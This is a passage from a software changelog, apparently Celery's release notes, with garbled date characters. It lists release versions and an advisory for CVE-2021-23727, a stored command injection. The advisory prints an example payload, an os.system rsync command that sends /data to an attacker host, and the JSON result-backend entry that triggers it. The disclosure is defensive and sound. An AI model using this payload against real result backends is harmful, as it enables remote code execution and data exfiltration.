π :release-date: 2022εΉ΄08ζ01ζ₯ 5:15 P.M UTC+6:00 π :release-by: Asif Saif Uddin
.. _version-5.3.0a1:
π :release-date: 2022εΉ΄06ζ29ζ₯ 5:15 P.M UTC+6:00 π :release-by: Asif Saif Uddin
.. _version-5.2.7:
π :release-date: 2022εΉ΄5ζ26ζ₯ 12:15 P.M UTC+2:00 π :release-by: Omer Katz
.. _version-5.2.6:
π :release-date: 2022εΉ΄4ζ04ζ₯ 21:15 P.M UTC+2:00 π :release-by: Omer Katz
.. _version-5.2.5:
π :release-date: 2022εΉ΄4ζ03ζ₯ 20:42 P.M UTC+2:00 π :release-by: Omer Katz
π This release was yanked due to a regression caused by the PR below
.. _version-5.2.4:
π :release-date: 2022εΉ΄4ζ03ζ₯ 20:30 P.M UTC+2:00 π :release-by: Omer Katz
.. _version-5.2.3:
π :release-date: 2021εΉ΄12ζ29ζ₯ 12:00 P.M UTC+6:00 π :release-by: Asif Saif Uddin
.. _version-5.2.2:
π :release-date: 2021εΉ΄12ζ26ζ₯ 16:30 P.M UTC+2:00 π :release-by: Omer Katz
π Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
os.system("rsync /data attacker@192.168.56.100:~/data")
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload rsync /data attacker@192.168.56.100:~/data as the exception arguments like so:
.. code-block:: python
{
"exc_module": "os",
'exc_type': "system",
"exc_message": "rsync /data attacker@192.168.56.100:~/data"
}
According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
.. _version-5.2.1:
π :release-date: 2021εΉ΄11ζ16ζ₯ 8.55 P.M UTC+6:00 π :release-by: Asif Saif Uddin
.. _version-5.2.0:
π :release-date: 2021εΉ΄11ζ08ζ₯ 7.15 A.M UTC+6:00 π :release-by: Asif Saif Uddin
.. _version-5.2.0rc2: